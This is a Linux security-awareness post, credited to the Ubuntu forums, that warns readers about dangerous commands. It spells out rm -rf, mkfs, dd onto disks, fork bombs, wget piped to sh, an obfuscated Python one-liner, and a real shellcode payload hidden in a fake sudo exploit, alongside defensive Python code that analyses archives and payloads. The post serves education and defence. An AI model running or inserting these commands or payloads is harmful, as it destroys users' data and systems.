courtesy:ubuntu forums
DANGEROUS COMMANDS -- look but DO NOT RUN.
Also, this is far from an exhaustive list, but it should give you some
clues as to what kind of things people may try to trick you into
doing. Remember that any of these can be disguised in an obfuscated
command or buried in a long procedure, so the bottom line is: be
cautious whenever something just doesn't "feel right".
Delete all files, delete the current directory, and delete the visible
files in the current directory. It's quite obvious why these commands
are dangerous to execute. (Current GNU rm refuses rm -rf / unless you
add --no-preserve-root, and refuses to remove . and .. outright, but
that guard is shallow: a wildcard that expands to everything under the
root gets no such protection, so treat all three as deadly.)
Code:
rm -rf /
rm -rf .
rm -rf *
The only problem with a .* wildcard for hidden files is that .., the
link to the parent directory, is matched by it too, which in turn
deletes everything above this directory level (oops!). A possible
alternative that I can think of for this would be
Code:
rm -r .[^.]*
which excludes the entry "..". Of course, it probably has the
limitation of not matching certain entries; fixing that is left as an
exercise for the reader.
Reformat: Data on the device named after the mkfs command is
destroyed and replaced with a blank filesystem. mkfs.anything stands
for every mkfs.* variant (ext3, vfat, xfs, ...); they all do the same
thing to the device you hand them.
Code:
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation: Writes raw data straight onto a block
device, bypassing the filesystem. This usually clobbers the filesystem
and causes total loss of data. Neither dd nor a shell redirection
gives a warning or a confirmation prompt: whatever of= or the
redirection names is overwritten, so check what a device actually is
(lsblk, findmnt) before you type its name anywhere near one of these:
Code:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Spawns processes without limit until the system freezes,
forcing you to do a hard reset which may cause corruption, data
loss, or other awful fates. A per-user process limit (ulimit -u for
the shell, or an nproc line in /etc/security/limits.conf) bounds the
damage: the bomb then runs out of process slots instead of the machine.
In Bourne-ish shells, like Bash: (this thing looks really intriguing
and provokes curiosity)
Code:
:(){ :|:& };:
This defines a function named : whose body pipes : into another : and
backgrounds the pair, then calls it once; every call spawns two more,
so the count doubles each round.
In Perl:
Code:
fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing
directory. The archive can be crafted to explode into a million
files, or to overwrite existing files by using paths it expects to
find there (absolute paths, ../ components, or names that collide
with files already in the directory). Make a habit of unpacking tars
inside a freshly created directory, and of listing the contents first.
Decompression bomb: Someone asks you to extract an archive which
appears to be a small download. In reality it's highly compressible
data (long runs of zeros, say) and will inflate to hundreds of GB,
filling your hard drive. Do not touch data from an untrusted source.
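The two checks those warnings call for, as an added example that is not part of the original post: a member-list inspection that flags tarbomb indicators without extracting anything, and a capped decompression that stops as soon as a size limit is passed. The tar and gzip blobs are constructed inside the code, and the thresholds (one top-level entry, a 1 MiB cap) are assumptions for the demonstration.

```python
# Added example (not from the original post): inspect an archive before
# extracting it, and measure a compressed blob's inflated size with a cap.
import gzip
import io
import tarfile


def tar_findings(blob: bytes, max_top_level: int = 1) -> dict:
    """Read the member list only (nothing is extracted) and report tarbomb
    indicators: paths that escape the extraction directory, links pointing
    outside it, device nodes, and a spray of top-level entries."""
    findings = []
    top_level = set()
    declared = 0
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
        for m in tar.getmembers():
            parts = m.name.split("/")
            top_level.add(parts[0])
            declared += m.size
            if m.name.startswith("/") or ".." in parts:
                findings.append(f"path escape: {m.name}")
            if (m.issym() or m.islnk()) and (
                m.linkname.startswith("/") or ".." in m.linkname.split("/")
            ):
                findings.append(f"link escape: {m.name} -> {m.linkname}")
            if m.isdev():
                findings.append(f"device node: {m.name}")
    if len(top_level) > max_top_level:
        findings.append(f"tarbomb: {len(top_level)} top-level entries")
    return {"findings": findings, "top_level": len(top_level),
            "declared_size": declared}


def inflated_size(gz: bytes, limit: int) -> tuple[int, bool]:
    """Decompress in 64 KiB chunks and stop as soon as `limit` is exceeded,
    so a decompression bomb never lands on disk or in memory at once.
    Returns (bytes seen so far, limit exceeded?)."""
    total = 0
    with gzip.GzipFile(fileobj=io.BytesIO(gz)) as f:
        while True:
            chunk = f.read(1 << 16)
            if not chunk:
                return total, False
            total += len(chunk)
            if total > limit:
                return total, True


# --- constructed samples (built here, not real downloads) -----------------

def build_tarbomb() -> bytes:
    """A constructed tar using the tricks the post describes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name, data=b"x"):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        add_file("../../etc/cron.d/job")      # climbs out of the directory
        add_file("/etc/profile.d/z.sh")       # absolute path
        link = tarfile.TarInfo("link")        # symlink aimed at /etc ...
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc"
        tar.addfile(link)
        add_file("link/hosts")                # ... then a file written through it
        for i in range(50):                   # spray into the current directory
            add_file(f"file{i}.txt")
    return buf.getvalue()


def build_decompression_bomb(megabytes: int = 8) -> bytes:
    """Zeros compress to almost nothing: a few KiB that inflate to megabytes."""
    return gzip.compress(b"\0" * (megabytes << 20), compresslevel=9)
```

Note that "link/hosts" passes the name check on its own; only the symlink it goes through is flagged, which is why the link test is there. Python 3.12 (and the 3.8.17/3.9.17/3.10.12/3.11.4 backports) lets you enforce the same rules at extraction time with `tar.extractall(path, filter="data")`, which rejects exactly these members.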
Shellscript: Someone gives you a link to a shell script to execute.
It can contain any command they choose -- benign or malevolent. Do
not execute code from people you don't trust, and do not pipe a
download straight into a shell: with -O- | sh you never see the script
before it runs, and if the connection drops part-way the shell happily
executes whatever truncated fragment it did receive. Fetch to a file
and read it first.
Code:
wget http://some_place/some_file
sh ./some_file
Code:
wget http://some_place/some_file -O- | sh
Compiling code: Someone gives you source code and tells you to
compile it. It is easy to hide malicious code in a large wad of
source, and source code gives the attacker far more room for
disguising a payload than a one-line command does. Do not compile OR
execute the compiled code unless the source is that of some well-known
application, obtained from a reputable site (e.g. SourceForge, the
author's homepage, an Ubuntu address).
A famous example of this surfaced on a mailing list disguised as a
proof-of-concept sudo exploit, claiming that if you run it, sudo grants
you root without a shell. In it was this payload:
Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
   /* section(".text") makes the array executable, so the bytes can simply be called */
   = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"  /* jmp to the call at the end, which yields the address of "/bin/sh" */
     "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"  /* four push imm32 ... */
     "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"  /* ... then NOT each pushed word in place ... */
     "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"  /* ... leaving "rm -rf ~ / &" on the stack */
     "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"  /* execve("/bin/sh", {"/bin/sh","-c",cmd}) via int 0x80 */
     "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"  /* exit if execve returns; "/bin/sh" */
     "\x6e\x2f\x73\x68\x00\x2d\x63\x00"                   /* "-c" */
     "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";  /* decoy: never referenced by the code above */
To the new or even lightly experienced computer user, this looks like
the "hex code gibberish stuff" that is so typical of a safe proof of
concept, and the readable cp/chmod tail says exactly what the post
claimed it does. However, that tail is a decoy the shellcode never
touches: the hex bytes are x86 Linux shellcode that pushes four words
onto the stack, flips every bit of them with NOT so the text never
appears in the source, and runs /bin/sh -c on the result. That result
is rm -rf ~ / &, which will destroy your home directory as a regular
user, or all files as root. If you could see this command in the hex
string, then you don't need to be reading this announcement.
Otherwise, remember that these things can come in very novel forms --
watch out.
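How to pull that hidden string out of the payload without executing a byte of it, as an added example that is not part of the original post: collect the run of back-to-back push imm32 instructions, undo the NOT the shellcode applies, and lay the words out in stack order. The decoder assumes the specific obfuscation used here (push then NOT); other shellcode uses XOR keys or builds strings differently, so this is a worked analysis of this payload rather than a general disassembler. The byte string is the one printed in the post, decoy tail included.

```python
# Added example (not from the original post): recover the command string
# hidden in the "e.s.p release" payload by static analysis only.
import re
import struct

# The payload bytes from the post, including the readable decoy tail.
ESP_PAYLOAD = (
    b"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    b"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    b"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    b"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    b"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    b"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    b"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    b"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"
)


def push_imm32_runs(code: bytes) -> list[list[int]]:
    """Collect every run of consecutive `push imm32` (opcode 0x68)
    instructions, each immediate decoded little-endian. Shellcode that
    builds a string on the stack uses exactly such a run; a stray 0x68
    elsewhere (the 'h' in "/bin/sh" or "chmod") only forms a run of one."""
    runs, run, i = [], [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            run.append(struct.unpack_from("<I", code, i + 1)[0])
            i += 5
        else:
            if run:
                runs.append(run)
                run = []
            i += 1
    if run:
        runs.append(run)
    return runs


def stack_string(pushes: list[int]) -> str:
    """Rebuild the text the pushes leave in memory. The last push lands at
    the lowest address, so the run is reversed; this payload then runs
    `not dword [esi+0/4/8/12]` over the words, so each is inverted back;
    the words are laid out little-endian and cut at the first NUL."""
    raw = b"".join(struct.pack("<I", ~v & 0xFFFFFFFF) for v in reversed(pushes))
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def hidden_command(code: bytes) -> str:
    """The string built by the longest push run in `code`."""
    longest = max(push_imm32_runs(code), key=len)
    return stack_string(longest)


def printable_strings(code: bytes, min_len: int = 5) -> list[bytes]:
    """Roughly what `strings` would show: the decoy and "/bin/sh", but
    never the real command. This is why the hex was not safe gibberish."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, code)
```

Running `hidden_command(ESP_PAYLOAD)` gives the command the post names, while `printable_strings(ESP_PAYLOAD)` shows only the decoy and "/bin/sh", which is the whole point of the NOT trick: a casual strings pass sees what the attacker wants it to see.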
Again, recall that these are not at all comprehensive, and you should
not use this as a checklist to decide whether a command is dangerous
or not! For example, 30 seconds in Python yields something like this:
Code:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
Where "sn!.sg!+" is simply rm -rf * with every character shifted up by
one. Of course this is a silly example -- I wouldn't expect anyone to
be foolish enough to paste this monstrous thing into their terminal
without suspecting something might be wrong.
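A way to see what such a one-liner would hand to the shell without running the script, as an added example that is not part of the original post: parse it with the ast module, find calls to the usual command sinks (os.system, subprocess.*, eval, exec), and evaluate only the first argument of each in a namespace that contains string-building helpers and nothing else. The sink list and the allowed names are assumptions, and this is a triage aid rather than a sandbox: the script itself is never executed, only its argument expressions, and anything those expressions cannot build from the allowed names comes back marked unresolved for manual review. The samples are constructed here; the first is the post's shifted-string trick, the rest generalise it to base64 and hex encodings of the same idea.

```python
# Added example (not from the original post): reveal what an obfuscated
# Python one-liner would pass to the shell, by evaluating only the argument
# expressions of known command sinks in a restricted namespace.
import ast
import base64
import binascii
import codecs

# Calls whose first argument is a command string or code to be executed.
SHELL_SINKS = {
    ("os", "system"), ("os", "popen"),
    ("subprocess", "call"), ("subprocess", "run"), ("subprocess", "Popen"),
    ("subprocess", "check_output"), ("subprocess", "check_call"),
    ("", "eval"), ("", "exec"),
}

# The only names an argument expression may use: pure string-building
# helpers, no files, network or processes. Triage aid, not a sandbox.
SAFE_NAMES = {
    "__builtins__": {},
    "chr": chr, "ord": ord, "str": str, "bytes": bytes, "int": int,
    "len": len, "range": range, "reversed": reversed,
    "base64": base64, "binascii": binascii, "codecs": codecs,
}


def _callee(func: ast.expr):
    """('os', 'system') for os.system(...), ('', 'eval') for eval(...)."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    if isinstance(func, ast.Name):
        return ("", func.id)
    return None


def reveal_commands(src: str) -> list[str]:
    """Return the decoded first argument of every shell/exec sink in `src`.
    Arguments needing anything outside SAFE_NAMES (a file read, a network
    fetch) come back as '<unresolved: ...>' so a human looks at them."""
    found = []
    for node in ast.walk(ast.parse(src)):
        if not (isinstance(node, ast.Call) and node.args):
            continue
        if _callee(node.func) not in SHELL_SINKS:
            continue
        arg = node.args[0]
        try:
            value = eval(compile(ast.Expression(body=arg), "<arg>", "eval"),
                         dict(SAFE_NAMES))
            if isinstance(value, bytes):
                value = value.decode("utf-8", "replace")
            found.append(str(value))
        except Exception:
            found.append(f"<unresolved: {ast.unparse(arg)}>")
    return found


# Constructed samples: the post's shifted string, two other encodings of the
# same command, and one argument that cannot be resolved statically.
SAMPLES = [
    'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))',
    'import subprocess, base64; '
    'subprocess.call(base64.b64decode("cm0gLXJmIC8=").decode(), shell=True)',
    'import os; os.system(bytes.fromhex("726d202d7266202a").decode())',
    'import os; os.system(open("/tmp/cmd").read())',
]
```

The restricted namespace is what keeps the evaluation honest: a comprehension over chr/ord, a base64 decode or bytes.fromhex all resolve to the plain command, while an argument that reads a file or the network fails with NameError and is reported instead of guessed at. Run it on a throwaway copy of the script, not on anything you have already pasted into a root shell.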